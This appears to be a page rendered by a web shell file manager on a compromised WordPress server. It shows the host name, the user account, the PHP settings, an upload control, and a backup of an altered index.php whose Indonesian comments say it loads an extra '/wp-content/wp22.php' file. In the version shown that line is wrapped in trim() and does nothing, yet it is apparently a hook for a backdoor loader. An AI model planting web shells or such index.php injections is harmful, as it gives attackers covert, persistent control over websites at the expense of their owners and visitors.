HEX
Server: Apache
System: Linux hz.vslconceptsdomains.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: dkfounda (3233)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //proc/self/cwd/.backup/index.php.bak_20251223_025935
<?php
/**
 * Front to the WordPress application.
 * Loads custom code and then the WordPress core.
 */

// 1. Instruksi untuk WordPress agar menggunakan tema aktif
define('WP_USE_THEMES', true);

// 2. Muat file konfigurasi/kustom Anda
// Pastikan wp22.php tidak memuat ulang inti WordPress
trim('/wp-content/wp22.php');

// 3. Muat lingkungan dan template WordPress
require_once __DIR__ . '/wp-blog-header.php';